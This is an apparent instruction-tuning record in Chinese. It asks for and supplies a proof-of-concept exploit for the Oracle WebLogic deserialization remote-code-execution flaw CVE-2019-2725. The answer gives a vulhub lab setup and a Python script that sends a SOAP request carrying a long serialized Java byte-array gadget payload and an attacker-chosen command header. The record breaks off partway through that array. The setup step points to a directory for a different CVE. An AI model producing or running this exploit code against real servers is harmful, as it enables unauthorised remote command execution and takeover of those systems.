  1069. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Weblogic 反序列化远程代码执行漏洞 CVE-2019-2725\n漏洞描述:2019年06月15日,360CERT监测到在野的Oracle Weblogic远程反序列化命令执行漏洞,该漏洞绕过了最新的Weblogic补丁(CVE-2019-2725),攻击者可以发送精心构造的恶意HTTP请求,在未授权的情况下远程执行命令。目前官方补丁未发布,漏洞细节未公开。360CERT经研判后判定该漏洞综合评级为“高危”,强烈建议受影响的用户尽快根据临时修补建议进行临时处置,防止收到攻击者攻击。\n影响版本:``` Weblogic 10.3.6 Weblogic 12.1.3 ```\n", "input": "", "output": "【漏洞类型】web_server_vulnerability\n【CVE编号】CVE-2019-2725\n【POC利用方法】\n1. Weblogic 10.3.6\nWeblogic 12.1.3\n2. git clone https://github.com/vulhub/vulhub.git\ncd vulhub/weblogic/CVE-2017-10271\ndocker-compose up -d\n3. # encoding=utf8\nimport sys\nimport requests\nfrom logzero import logger\n\n\nheaders = {\n    \"Accept-Language\":\"zh-CN,zh;q=0.9,en;q=0.8\",\n    \"User-Agent\":\"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50\", \n    \"Content-Type\":\"text/xml\",\n}\n\n\ndef weblogic_10_3_6(ip,cmd):\t\n\theaders = {\n    \"Accept-Language\":\"zh-CN,zh;q=0.9,en;q=0.8\",\n    \"User-Agent\":\"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50\", \n    \"Content-Type\":\"text/xml\",\n    \"cmd\":\"%s\"%(cmd)\n}\n\tbody = \"\"\"<?xml version=\"1.0\" encoding=\"utf-8\" ?>\n<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" \nxmlns:wsa=\"http://www.w3.org/2005/08/addressing\" \nxmlns:asy=\"http://www.bea.com/async/AsyncResponseService\">   \n<soapenv:Header> <wsa:Action/><wsa:RelatesTo/><asy:onAsyncDelivery/>\n<work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">  \n<class><string>oracle.toplink.internal.sessions.UnitOfWorkChangeSet</string><void>\n<array class=\"byte\" length=\"5010\"><void index=\"0\"><byte>-84</byte></void><void index=\"1\"><byte>-19</byte></void><void index=\"2\"><byte>0</byte></void><void index=\"3\"><byte>5</byte></void><void index=\"4\"><byte>115</byte></void><void index=\"5\"><byte>114</byte></void><void index=\"6\"><byte>0</byte></void><void index=\"7\"><byte>23</byte></void><void index=\"8\"><byte>106</byte></void><void index=\"9\"><byte>97</byte></void><void index=\"10\"><byte>118</byte></void><void index=\"11\"><byte>97</byte></void><void index=\"12\"><byte>46</byte></void><void index=\"13\"><byte>117</byte></void><void index=\"14\"><byte>116</byte></void><void index=\"15\"><byte>105</byte></void><void index=\"16\"><byte>108</byte></void><void index=\"17\"><byte>46</byte></void><void index=\"18\"><byte>76</byte></void><void index=\"19\"><byte>105</byte></void><void index=\"20\"><byte>110</byte></void><void index=\"21\"><byte>107</byte></void><void index=\"22\"><byte>101</byte></void><void index=\"23\"><byte>100</byte></void><void index=\"24\"><byte>72</byte></void><void index=\"25\"><byte>97</byte></void><void index=\"26\"><byte>115</byte></void><void index=\"27\"><byte>104</byte></void><void index=\"28\"><byte>83</byte></void><void index=\"29\"><byte>101</byte></void><void index=\"30\"><byte>116</byte></void><void index=\"31\"><byte>-40</byte></void><void index=\"32\"><byte>108</byte></void><void index=\"33\"><byte>-41</byte></void><void index=\"34\"><byte>90</byte></void><void index=\"35\"><byte>-107</byte></void><void index=\"36\"><byte>-35</byte></void><void index=\"37\"><byte>42</byte></void><void index=\"38\"><byte>30</byte></void><void index=\"39\"><byte>2</byte></void><void index=\"40\"><byte>0</byte></void><void index=\"41\"><byte>0</byte></void><void index=\"42\"><byte>120</byte></void><void index=\"43\"><byte>114</byte></void><void index=\"44\"><byte>0</byte></void><void index=\"45\"><byte>17</byte></void><void index=\"46\"><byte>106</byte></void><void index=\"47\"><byte>97</byte></void><void index=\"48\"><byte>118</byte></void><void index=\"49\"><byte>97</byte></void><void index=\"50\"><byte>46</byte></void><void index=\"51\"><byte>117</byte></void><void index=\"52\"><byte>116</byte></void><void index=\"53\"><byte>105</byte></void><void index=\"54\"><byte>108</byte></void><void index=\"55\"><byte>46</byte></void><void index=\"56\"><byte>72</byte></void><void index=\"57\"><byte>97</byte></void><void index=\"58\"><byte>115</byte></void><void index=\"59\"><byte>104</byte></void><void index=\"60\"><byte>83</byte></void><void index=\"61\"><byte>101</byte></void><void index=\"62\"><byte>116</byte></void><void index=\"63\"><byte>-70</byte></void><void index=\"64\"><byte>68</byte></void><void index=\"65\"><byte>-123</byte></void><void index=\"66\"><byte>-107</byte></void><void index=\"67\"><byte>-106</byte></void><void index=\"68\"><byte>-72</byte></void><void index=\"69\"><byte>-73</byte></void><void index=\"70\"><byte>52</byte></void><void index=\"71\"><byte>3</byte></void><void index=\"72\"><byte>0</byte></void><void index=\"73\"><byte>0</byte></void><void index=\"74\"><byte>120</byte></void><void index=\"75\"><byte>112</byte></void><void index=\"76\"><byte>119</byte></void><void index=\"77\"><byte>12</byte></void><void index=\"78\"><byte>0</byte></void><void index=\"79\"><byte>0</byte></void><void index=\"80\"><byte>0</byte></void><void index=\"81\"><byte>16</byte></void><void index=\"82\"><byte>63</byte></void><void index=\"83\"><byte>64</byte></void><void index=\"84\"><byte>0</byte></void><void index=\"85\"><byte>0</byte></void><void index=\"86\"><byte>0</byte></void><void index=\"87\"><byte>0</byte></void><void index=\"88\"><byte>0</byte></void><void index=\"89\"><byte>2</byte></void><void index=\"90\"><byte>115</byte></void><void index=\"91\"><byte>114</byte></void><void index=\"92\"><byte>0</byte></void><void index=\"93\"><byte>58</byte></void><void index=\"94\"><byte>99</byte></void><void index=\"95\"><byte>111</byte></void><void index=\"96\"><byte>109</byte></void><void index=\"97\"><byte>46</byte></void><void index=\"98\"><byte>115</byte></void><void index=\"99\"><byte>117</byte></void><void index=\"100\"><byte>110</byte></void><void index=\"101\"><byte>46</byte></void><void index=\"102\"><byte>111</byte></void><void index=\"103\"><byte>114</byte></void><void index=\"104\"><byte>103</byte></void><void index=\"105\"><byte>46</byte></void><void index=\"106\"><byte>97</byte></void><void index=\"107\"><byte>112</byte></void><void index=\"108\"><byte>97</byte></void><void index=\"109\"><byte>99</byte></void><void index=\"110\"><byte>104</byte></void><void index=\"111\"><byte>101</byte></void><void index=\"112\"><byte>46</byte></void><void index=\"113\"><byte>120</byte></void><void index=\"114\"><byte>97</byte></void><void index=\"115\"><byte>108</byte></void><void index=\"116\"><byte>97</byte></void><void index=\"117\"><byte>110</byte></void><void index=\"118\"><byte>46</byte></void><void index=\"119\"><byte>105</byte></void><void index=\"120\"><byte>110</byte></void><void index=\"121\"><byte>116</byte></void><void index=\"122\"><byte>101</byte></void><void index=\"123\"><byte>114</byte></void><void index=\"124\"><byte>110</byte></void><void index=\"125\"><byte>97</byte></void><void index=\"126\"><byte>108</byte></void><void index=\"127\"><byte>46</byte></void><void index=\"128\"><byte>120</byte></void><void index=\"129\"><byte>115</byte></void><void index=\"130\"><byte>108</byte></void><void index=\"131\"><byte>116</byte></void><void index=\"132\"><byte>99</byte></void><void index=\"133\"><byte>46</byte></void><void index=\"134\"><byte>116</byte></void><void index=\"135\"><byte>114</byte></void><void index=\"136\"><byte>97</byte></void><void index=\"137\"><byte>120</byte></void><void index=\"138\"><byte>46</byte></void><void index=\"139\"><byte>84</byte></void><void index=\"140\"><byte>101</byte></void><void index=\"141\"><byte>109</byte></void><void index=\"142\"><byte>112</byte></void><void index=\"143\"><byte>108</byte></void><void index=\"144\"><byte>97</byte></void><void index=\"145\"><byte>116</byte></void><void index=\"146\"><byte>101</byte></void><void index=\"147\"><byte>115</byte></void><void index=\"148\"><byte>73</byte></void><void index=\"149\"><byte>109</byte></void><void index=\"150\"><byte>112</byte></void><void index=\"151\"><byte>108</byte></void><void index=\"152\"><byte>9</byte></void><void index=\"153\"><byte>87</byte></void><void index=\"154\"><byte>79</byte></void><void index=\"155\"><byte>-63</byte></void><void index=\"156\"><byte>110</byte></void><void index=\"157\"><byte>-84</byte></void><void index=\"158\"><byte>-85</byte></void><void index=\"159\"><byte>51</byte></void><void index=\"160\"><byte>3</byte></void><void index=\"161\"><byte>0</byte></void><void index=\"162\"><byte>9</byte></void><void index=\"163\"><byte>73</byte></void><void index=\"164\"><byte>0</byte></void><void index=\"165\"><byte>13</byte></void><void index=\"166\"><byte>95</byte></void><void index=\"167\"><byte>105</byte></void><void index=\"168\"><byte>110</byte></void><void index=\"169\"><byte>100</byte></void><void index=\"170\"><byte>101</byte></void><void index=\"171\"><byte>110</byte></void><void index=\"172\"><byte>116</byte></void><void index=\"173\"><byte>78</byte></void><void index=\"174\"><byte>117</byte></void><void index=\"175\"><byte>109</byte></void><void index=\"176\"><byte>98</byte></void><void index=\"177\"><byte>101</byte></void><void index=\"178\"><byte>114</byte></void><void index=\"179\"><byte>73</byte></void><void index=\"180\"><byte>0</byte></void><void index=\"181\"><byte>14</byte></void><void index=\"182\"><byte>95</byte></void><void index=\"183\"><byte>116</byte></void><void index=\"184\"><byte>114</byte></void><void index=\"185\"><byte>97</byte></void><void index=\"186\"><byte>110</byte></void><void index=\"187\"><byte>115</byte></void><void index=\"188\"><byte>108</byte></void><void index=\"189\"><byte>101</byte></void><void index=\"190\"><byte>116</byte></void><void index=\"191\"><byte>73</byte></void><void index=\"192\"><byte>110</byte></void><void index=\"193\"><byte>100</byte></void><void index=\"194\"><byte>101</byte></void><void index=\"195\"><byte>120</byte></void><void index=\"196\"><byte>90</byte></void><void index=\"197\"><byte>0</byte></void><void index=\"198\"><byte>21</byte></void><void index=\"199\"><byte>95</byte></void><void index=\"200\"><byte>117</byte></void><void index=\"201\"><byte>115</byte></void><void index=\"202\"><byte>101</byte></void><void index=\"203\"><byte>83</byte></void><void index=\"204\"><byte>101</byte></void><void index=\"205\"><byte>114</byte></void><void index=\"206\"><byte>118</byte></void><void index=\"207\"><byte>105</byte></void><void index=\"208\"><byte>99</byte></void><void index=\"209\"><byte>101</byte></void><void index=\"210\"><byte>115</byte></void><void index=\"211\"><byte>77</byte></void><void index=\"212\"><byte>101</byte></void><void index=\"213\"><byte>99</byte></void><void index=\"214\"><byte>104</byte></void><void index=\"215\"><byte>97</byte></void><void index=\"216\"><byte>110</byte></void><void index=\"217\"><byte>105</byte></void><void index=\"218\"><byte>115</byte></void><void index=\"219\"><byte>109</byte></void><void index=\"220\"><byte>76</byte></void><void index=\"221\"><byte>0</byte></void><void index=\"222\"><byte>25</byte></void><void index=\"223\"><byte>95</byte></void><void index=\"224\"><byte>97</byte></void><void index=\"225\"><byte>99</byte></void><void index=\"226\"><byte>99</byte></void><void index=\"227\"><byte>101</byte></void><void index=\"228\"><byte>115</byte></void><void index=\"229\"><byte>115</byte></void><void index=\"230\"><byte>69</byte></void><void index=\"231\"><byte>120</byte></void><void index=\"232\"><byte>116</byte></void><void index=\"233\"><byte>101</byte></void><void index=\"234\"><byte>114</byte></void><void index=\"235\"><byte>110</byte></void><void index=\"236\"><byte>97</byte></void><void index=\"237\"><byte>108</byte></void><void index=\"238\"><byte>83</byte></void><void index=\"239\"><byte>116</byte></void><void index=\"240\"><byte>121</byte></void><void index=\"241\"><byte>108</byte></void><void index=\"242\"><byte>101</byte></void><void index=\"243\"><byte>115</byte></void><void index=\"244\"><byte>104</byte></void><void index=\"245\"><byte>101</byte></void><void index=\"246\"><byte>101</byte></void><void index=\"247\"><byte>116</byte></void><void index=\"248\"><byte>116</byte></void><void index=\"249\"><byte>0</byte></void><void index=\"250\"><byte>18</byte></void><void index=\"251\"><byte>76</byte></void><void index=\"252\"><byte>106</byte></void><void index=\"253\"><byte>97</byte></void><void index=\"254\"><byte>118</byte></void><void index=\"255\"><byte>97</byte></void><void index=\"256\"><byte>47</byte></void><void index=\"257\"><byte>108</byte></void><void index=\"258\"><byte>97</byte></void><void index=\"259\"><byte>110</byte></void><void index=\"260\"><byte>103</byte></void><void index=\"261\"><byte>47</byte></void><void index=\"262\"><byte>83</byte></void><void index=\"263\"><byte>116</byte></void><void index=\"264\"><byte>114</byte></void><void index=\"265\"><byte>105</byte></void><void index=\"266\"><byte>110</byte></void><void index=\"267\"><byte>103</byte></void><void index=\"268\"><byte>59</byte></void><void index=\"269\"><byte>76</byte></void><void index=\"270\"><byte>0</byte></void><void index=\"271\"><byte>11</byte></void><void index=\"272\"><byte>95</byte></void><void index=\"273\"><byte>97</byte></void><void index=\"274\"><byte>117</byte></void><void index=\"275\"><byte>120</byte></void><void index=\"276\"><byte>67</byte></void><void index=\"277\"><byte>108</byte></void><void index=\"278\"><byte>97</byte></void><void index=\"279\"><byte>115</byte></void><void index=\"280\"><byte>115</byte></void><void index=\"281\"><byte>101</byte></void><void index=\"282\"><byte>115</byte></void><void index=\"283\"><byte>116</byte></void><void index=\"284\"><byte>0</byte></void><void index=\"285\"><byte>59</byte></void><void index=\"286\"><byte>76</byte></void><void index=\"287\"><byte>99</byte></void><void index=\"288\"><byte>111</byte></void><void index=\"289\"><byte>109</byte></void><void index=\"290\"><byte>47</byte></void><void index=\"291\"><byte>115</byte></void><void index=\"292\"><byte>117</byte></void><void index=\"293\"><byte>110</byte></void><void index=\"294\"><byte>47</byte></void><void index=\"295\"><byte>111</byte></void><void index=\"296\"><byte>114</byte></void><void index=\"297\"><byte>103</byte></void><void index=\"298\"><byte>47</byte></void><void index=\"299\"><byte>97</byte></void><void index=\"300\"><byte>112</byte></void><void index=\"301\"><byte>97</byte></void><void index=\"302\"><byte>99</byte></void><void index=\"303\"><byte>104</byte></void><void index=\"304\"><byte>101</byte></void><void index=\"305\"><byte>47</byte></void><void index=\"306\"><byte>120</byte></void><void index=\"307\"><byte>97</byte></void><void index=\"308\"><byte>108</byte></void><void index=\"309\"><byte>97</byte></void><void index=\"310\"><byte>110</byte></void><void index=\"311\"><byte>47</byte></void><void index=\"312\"><byte>105</byte></void><void index=\"313\"><byte>110</byte></void><void index=\"314\"><byte>116</byte></void><void index=\"315\"><byte>101</byte></void><void index=\"316\"><byte>114</byte></void><void index=\"317\"><byte>110</byte></void><void index=\"318\"><byte>97</byte></void><void index=\"319\"><byte>108</byte></void><void index=\"320\"><byte>47</byte></void><void index=\"321\"><byte>120</byte></void><void index=\"322\"><byte>115</byte></void><void index=\"323\"><byte>108</byte></void><void index=\"324\"><byte>116</byte></void><void index=\"325\"><byte>99</byte></void><void index=\"326\"><byte>47</byte></void><void index=\"327\"><byte>114</byte></void><void index=\"328\"><byte>117</byte></void><void index=\"329\"><byte>110</byte></void><void index=\"330\"><byte>116</byte></void><void index=\"331\"><byte>105</byte></void><void index=\"332\"><byte>109</byte></void><void index=\"333\"><byte>101</byte></void><void index=\"334\"><byte>47</byte></void><void index=\"335\"><byte>72</byte></void><void index=\"336\"><byte>97</byte></void><void index=\"337\"><byte>115</byte></void><void index=\"338\"><byte>104</byte></void><void index=\"339\"><byte>116</byte></void><void index=\"340\"><byte>97</byte></void><void index=\"341\"><byte>98</byte></void><void index=\"342\"><byte>108</byte></void><void index=\"343\"><byte>101</byte></void><void index=\"344\"><byte>59</byte></void><void index=\"345\"><byte>91</byte></void><void index=\"346\"><byte>0</byte></void><void index=\"347\"><byte>10</byte></void><void index=\"348\"><byte>95</byte></void><void index=\"349\"><byte>98</byte></void><void index=\"350\"><byte>121</byte></void><void index=\"351\"><byte>116</byte></void><void index=\"352\"><byte>101</byte></void><void index=\"353\"><byte>99</byte></void><void index=\"354\"><byte>111</byte></void><void index=\"355\"><byte>100</byte></void><void index=\"356\"><byte>101</byte></void><void index=\"357\"><byte>115</byte></void><void index=\"358\"><byte>116</byte></void><void index=\"359\"><byte>0</byte></void><void index=\"360\"><byte>3</byte></void><void index=\"361\"><byte>91</byte></void><void index=\"362\"><byte>91</byte></void><void index=\"363\"><byte>66</byte></void><void index=\"364\"><byte>91</byte></void><void index=\"365\"><byte>0</byte></void><void index=\"366\"><byte>6</byte></void><void index=\"367\"><byte>95</byte></void><void index=\"368\"><byte>99</byte></void><void index=\"369\"><byte>108</byte></void><void index=\"370\"><byte>97</byte></void><void index=\"371\"><byte>115</byte></void><void index=\"372\"><byte>115</byte></void><void index=\"373\"><byte>116</byte></void><void index=\"374\"><byte>0</byte></void><void index=\"375\"><byte>18</byte></void><void index=\"376\"><byte>91</byte></void><void index=\"377\"><byte>76</byte></void><void index=\"378\"><byte>106</byte></void><void index=\"379\"><byte>97</byte></void><void index=\"380\"><byte>118</byte></void><void index=\"381\"><byte>97</byte></void><void index=\"382\"><byte>47</byte></void><void index=\"383\"><byte>108</byte></void><void index=\"384\"><byte>97</byte></void><void index=\"385\"><byte>110</byte></void><void index=\"386\"><byte>103</byte></void><void index=\"387\"><byte>47</byte></void><void index=\"388\"><byte>67</byte></void><void index=\"389\"><byte>108</byte></void><void index=\"390\"><byte>97</byte></void><void index=\"391\"><byte>115</byte></void><void index=\"392\"><byte>115</byte></void><void index=\"393\"><byte>59</byte></void><void index=\"394\"><byte>76</byte></void><void index=\"395\"><byte>0</byte></void><void index=\"396\"><byte>5</byte></void><void index=\"397\"><byte>95</byte></void><void index=\"398\"><byte>110</byte></void><void index=\"399\"><byte>97</byte></void><void index=\"400\"><byte>109</byte></void><void index=\"401\"><byte>101</byte></void><void index=\"402\"><byte>113</byte></void><void index=\"403\"><byte>0</byte></void><void index=\"404\"><byte>126</byte></void><void index=\"405\"><byte>0</byte></void><void index=\"406\"><byte>4</byte></void><void index=\"407\"><byte>76</byte></void><void index=\"408\"><byte>0</byte></void><void index=\"409\"><byte>17</byte></void><void index=\"410\"><byte>95</byte></void><void index=\"411\"><byte>111</byte></void><void index=\"412\"><byte>117</byte></void><void index=\"413\"><byte>116</byte></void><void index=\"414\"><byte>112</byte></void><void index=\"415\"><byte>117</byte></void><void index=\"416\"><byte>116</byte></void><void index=\"417\"><byte>80</byte></void><void index=\"418\"><byte>114</byte></void><void index=\"419\"><byte>111</byte></void><void index=\"420\"><byte>112</byte></void><void index=\"421\"><byte>101</byte></void><void index=\"422\"><byte>114</byte></void><void index=\"423\"><byte>116</byte></void><void index=\"424\"><byte>105</byte></void><void index=\"425\"><byte>101</byte></void><void index=\"426\"><byte>115</byte></void><void index=\"427\"><byte>116</byte></void><void index=\"428\"><byte>0</byte></void><void index=\"429\"><byte>22</byte></void><void index=\"430\"><byte>76</byte></void><void index=\"431\"><byte>106</byte></void><void index=\"432\"><byte>97</byte></void><void index=\"433\"><byte>118</byte></void><void index=\"434\"><byte>97</byte></void><void index=\"435\"><byte>47</byte></void><void index=\"436\"><byte>117</byte></void><void index=\"437\"><byte>116</byte></void><void index=\"438\"><byte>105</byte></void><void index=\"439\"><byte>108</byte></void><void index=\"440\"><byte>47</byte></void><void index=\"441\"><byte>80</byte></void><void index=\"442\"><byte>114</byte></void><void index=\"443\"><byte>111</byte></void><void index=\"444\"><byte>112</byte></void><void index=\"445\"><byte>101</byte></void><void index=\"446\"><byte>114</byte></void><void index=\"447\"><byte>116</byte></void><void index=\"448\"><byte>105</byte></void><void index=\"449\"><byte>101</byte></void><void index=\"450\"><byte>115</byte></void><void index=\"451\"><byte>59</byte></void><void index=\"452\"><byte>120</byte></void><void index=\"453\"><byte>112</byte></void><void index=\"454\"><byte>0</byte></void><void index=\"455\"><byte>0</byte></void><void index=\"456\"><byte>0</byte></void><void index=\"457\"><byte>0</byte></void><void index=\"458\"><byte>-1</byte></void><void index=\"459\"><byte>-1</byte></void><void index=\"460\"><byte>-1</byte></void><void index=\"461\"><byte>-1</byte></void><void index=\"462\"><byte>0</byte></void><void index=\"463\"><byte>116</byte></void><void index=\"464\"><byte>0</byte></void><void index=\"465\"><byte>3</byte></void><void index=\"466\"><byte>97</byte></void><void index=\"467\"><byte>108</byte></void><void index=\"468\"><byte>108</byte></void><void index=\"469\"><byte>112</byte></void><void index=\"470\"><byte>117</byte></void><void index=\"471\"><byte>114</byte></void><void index=\"472\"><byte>0</byte></void><void index=\"473\"><byte>3</byte></void><void index=\"474\"><byte>91</byte></void><void index=\"475\"><byte>91</byte></void><void index=\"476\"><byte>66</byte></void><void index=\"477\"><byte>75</byte></void><void index=\"478\"><byte>-3</byte></void><void index=\"479\"><byte>25</byte></void><void index=\"480\"><byte>21</byte></void><void index=\"481\"><byte>103</byte></void><void index=\"482\"><byte>103</byte></void><void index=\"483\"><byte>-37</byte></void><void index=\"484\"><byte>55</byte></void><void index=\"485\"><byte>2</byte></void><void index=\"486\"><byte>0</byte></void><void index=\"487\"><byte>0</byte></void><void index=\"488\"><byte>120</byte></void><void index=\"489\"><byte>112</byte></void><void index=\"490\"><byte>0</byte></void><void index=\"491\"><byte>0</byte></void><void index=\"492\"><byte>0</byte></void><void index=\"493\"><byte>2</byte></void><void index=\"494\"><byte>117</byte></void><void index=\"495\"><byte>114</byte></void><void index=\"496\"><byte>0</byte></void><void index=\"497\"><byte>2</byte></void><void index=\"498\"><byte>91</byte></void><void index=\"499\"><byte>66</byte></void><void index=\"500\"><byte>-84</byte></void><void index=\"501\"><byte>-13</byte></void><void index=\"502\"><byte>23</byte></void><void index=\"503\"><byte>-8</byte></void><void index=\"504\"><byte>6</byte></void><void index=\"505\"><byte>8</byte></void><void index=\"506\"><byte>84</byte></void><void index=\"507\"><byte>-32</byte></void><void index=\"508\"><byte>2</byte></void><void index=\"509\"><byte>0</byte></void><void index=\"510\"><byte>0</byte></void><void index=\"511\"><byte>120</byte></void><void index=\"512\"><byte>112</byte></void><void index=\"513\"><byte>0</byte></void><void index=\"514\"><byte>0</byte></void><void index=\"515\"><byte>14</byte></void><void index=\"516\"><byte>29</byte></void><void index=\"517\"><byte>-54</byte></void><void index=\"518\"><byte>-2</byte></void><void index=\"519\"><byte>-70</byte></void><void index=\"520\"><byte>-66</byte></void><void index=\"521\"><byte>0</byte></void><void index=\"522\"><byte>0</byte></void><void index=\"523\"><byte>0</byte></void><void index=\"524\"><byte>50</byte></void><void index=\"525\"><byte>0</byte></void><void index=\"526\"><byte>-70</byte></void><void index=\"527\"><byte>10</byte></void><void index=\"528\"><byte>0</byte></void><void index=\"529\"><byte>3</byte></void><void index=\"530\"><byte>0</byte></void><void index=\"531\"><byte>34</byte></void><void index=\"532\"><byte>7</byte></void><void index=\"533\"><byte>0</byte></void><void index=\"534\"><byte>-72</byte></void><void index=\"535\"><byte>7</byte></void><void index=\"536\"><byte>0</byte></void><void index=\"537\"><byte>37</byte></void><void index=\"538\"><byte>7</byte></void><void index=\"539\"><byte>0</byte></void><void index=\"540\"><byte>38</byte></void><void index=\"541\"><byte>1</byte></void><void index=\"542\"><byte>0</byte></void><void index=\"543\"><byte>16</byte></void><void index=\"544\"><byte>115</byte></void><void index=\"545\"><byte>101</byte></void><void index=\"546\"><byte>114</byte></void><void index=\"547\"><byte>105</byte></void><void index=\"548\"><byte>97</byte></void><void index=\"549\"><byte>108</byte></void><void index=\"550\"><byte>86</byte></void><void index=\"551\"><byte>101</byte></void><void index=\"552\"><byte>114</byte></void><void index=\"553\"><byte>115</byte></void><void index=\"554\"><byte>105</byte></void><void index=\"555\"><byte>111</byte></void><void index=\"556\"><byte>110</byte></void><void index=\"557\"><byte>85</byte></void><void index=\"558\"><byte>73</byte></void><void index=\"559\"><byte>68</byte></void><void index=\"560\"><byte>1</byte></void><void index=\"561\"><byte>0</byte></void><void index=\"562\"><byte>1</byte></void><void index=\"563\"><byte>74</byte></void><void index=\"564\"><byte>1</byte></void><void index=\"565\"><byte>0</byte></void><void index=\"566\"><byte>13</byte></void><void index=\"567\"><byte>67</byte></void><void index=\"568\"><byte>111</byte></void><void index=\"569\"><byte>110</byte></void><void index=\"570\"><byte>115</byte></void><void index=\"571\"><byte>116</byte></void><void index=\"572\"><byte>97</byte></void><void index=\"573\"><byte>110</byte></void><void index=\"574\"><byte>116</byte></void><void index=\"575\"><byte>86</byte></void><void index=\"576\"><byte>97</byte></void><void index=\"577\"><byte>108</byte></void><void index=\"578\"><byte>117</byte></void><void index=\"579\"><byte>101</byte></void><void index=\"580\"><byte>5</byte></void><void index=\"581\"><byte>-83</byte></void><void index=\"582\"><byte>32</byte></void><void index=\"583\"><byte>-109</byte></void><void index=\"584\"><byte>-13</byte></void><void index=\"585\"><byte>-111</byte></void><void index=\"586\"><byte>-35</byte></void><void index=\"587\"><byte>-17</byte></void><void index=\"588\"><byte>62</byte></void><void index=\"589\"><byte>1</byte></void><void index=\"590\"><byte>0</byte></void><void index=\"591\"><byte>6</byte></void><void index=\"592\"><byte>60</byte></void><void index=\"593\"><byte>105</byte></void><void index=\"594\"><byte>110</byte></void><void index=\"595\"><byte>105</byte></void><void index=\"596\"><byte>116</byte></void><void index=\"597\"><byte>62</byte></void><void index=\"598\"><byte>1</byte></void><void index=\"599\"><byte>0</byte></void><void index=\"600\"><byte>3</byte></void><void index=\"601\"><byte>40</byte></void><void index=\"602\"><byte>41</byte></void><void index=\"603\"><byte>86</byte></void><void index=\"604\"><byte>1</byte></void><void index=\"605\"><byte>0</byte></void><void index=\"606\"><byte>4</byte></void><void index=\"607\"><byte>67</byte></void><void index=\"608\"><byte>111</byte></void><void index=\"609\"><byte>100</byte></void><void index=\"610\"><byte>101</byte></void><void index=\"611\"><byte>1</byte></void><void index=\"612\"><byte>0</byte></void><void index=\"613\"><byte>15</byte></void><void index=\"614\"><byte>76</byte></void><void index=\"615\"><byte>105</byte></void><void index=\"616\"><byte>110</byte></void><void index=\"617\"><byte>101</byte></void><void index=\"618\"><byte>78</byte></void><void index=\"619\"><byte>117</byte></void><void index=\"620\"><byte>109</byte></void><void index=\"621\"><byte>98</byte></void><void index=\"622\"><byte>101</byte></void><void index=\"623\"><byte>114</byte></void><void index=\"624\"><byte>84</byte></void><void index=\"625\"><byte>97</byte></void><void index=\"626\"><byte>98</byte></void><void index=\"627\"><byte>108</byte></void><void index=\"628\"><byte>101</byte></void><void index=\"629\"><byte>1</byte></void><void index=\"630\"><byte>0</byte></void><void index=\"631\"><byte>18</byte></void><void index=\"632\"><byte>76</byte></void><void index=\"633\"><byte>111</byte></void><void index=\"634\"><byte>99</byte></void><void index=\"635\"><byte>97</byte></void><void index=\"636\"><byte>108</byte></void><void index=\"637\"><byte>86</byte></void><void index=\"638\"><byte>97</byte></void><void index=\"639\"><byte>114</byte></void><void index=\"640\"><byte>105</byte></void><void index=\"641\"><byte>97</byte></void><void index=\"642\"><byte>98</byte></void><void index=\"643\"><byte>108</byte></void><void index=\"644\"><byte>101</byte></void><void index=\"645\"><byte>84</byte></void><void index=\"646\"><byte>97</byte></void><void index=\"647\"><byte>98</byte></void><void index=\"648\"><byte>108</byte></void><void index=\"649\"><byte>101</byte></void><void index=\"650\"><byte>1</byte></void><void index=\"651\"><byte>0</byte></void><void index=\"652\"><byte>4</byte></void><void index=\"653\"><byte>116</byte></void><void index=\"654\"><byte>104</byte></void><void index=\"655\"><byte>105</byte></void><void index=\"656\"><byte>115</byte></void><void index=\"657\"><byte>1</byte></void><void index=\"658\"><byte>0</byte></void><void index=\"659\"><byte>19</byte></void><void index=\"660\"><byte>83</byte></void><void index=\"661\"><byte>116</byte></void><void index=\"662\"><byte>117</byte></void><void index=\"663\"><byte>98</byte></void><void index=\"664\"><byte>84</byte></void><void index=\"665\"><byte>114</byte></void><void index=\"666\"><byte>97</byte></void><void index=\"667\"><byte>110</byte></void><void index=\"668\"><byte>115</byte></void><void index=\"669\"><byte>108</byte></void><void index=\"670\"><byte>101</byte></void><void index=\"671\"><byte>116</byte></void><void index=\"672\"><byte>80</byte></void><void index=\"673\"><byte>97</byte></void><void index=\"674\"><byte>121</byte></void><void index=\"675\"><byte>108</byte></void><void index=\"676\"><byte>111</byte></void><void index=\"677\"><byte>97</byte></void><void index=\"678\"><byte>100</byte></void><void index=\"679\"><byte>1</byte></void><void index=\"680\"><byte>0</byte></void><void index=\"681\"><byte>12</byte></void><void index=\"682\"><byte>73</byte></void><void index=\"683\"><byte>110</byte></void><void index=\"684\"><byte>110</byte></void><void index=\"685\"><byte>101</byte></void><void index=\"686\"><byte>114</byte></void><void index=\"687\"><byte>67</byte></void><void index=\"688\"><byte>108</byte></void><void index=\"689\"><byte>97</byte></void><void index=\"690\"><byte>115</byte></void><void index=\"691\"><byte>115</byte></void><void index=\"692\"><byte>101</byte></void><void index=\"693\"><byte>115</byte></void><void index=\"694\"><byte>1</byte></void><void index=\"695\"><byte>0</byte></void><void index=\"696\"><byte>53</byte></void><void index=\"697\"><byte>76</byte></void><void index=\"698\"><byte>121</byte></void><void index=\"699\"><byte>115</byte></void><void index=\"700\"><byte>111</byte></void><void index=\"701\"><byte>115</byte></void><void index=\"702\"><byte>101</byte></void><void index=\"703\"><byte>114</byte></void><void index=\"704\"><byte>105</byte></void><void index=\"705\"><byte>97</byte></void><void index=\"706\"><byte>108</byte></void><void index=\"707\"><byte>47</byte></void><void index=\"708\"><byte>112</byte></void><void index=\"709\"><byte>97</byte></void><void index=\"710\"><byte>121</byte></void><void index=\"711\"><byte>108</byte></void><void index=\"712\"><byte>111</byte></void><void index=\"713\"><byte>97</byte></void><void index=\"714\"><byte>100</byte></void><void index=\"715\"><byte>115</byte></void><void index=\"716\"><byte>47</byte></void><void index=\"717\"><byte>117</byte></void><void index=\"718\"><byte>116</byte></void><void index=\"719\"><byte>105</byte></void><void index=\"720\"><byte>108</byte></void><void index=\"721\"><byte>47</byte></void><void index=\"722\"><byte>71</byte></void><void index=\"723\"><byte>97</byte></void><void index=\"724\"><byte>100</byte></void><void 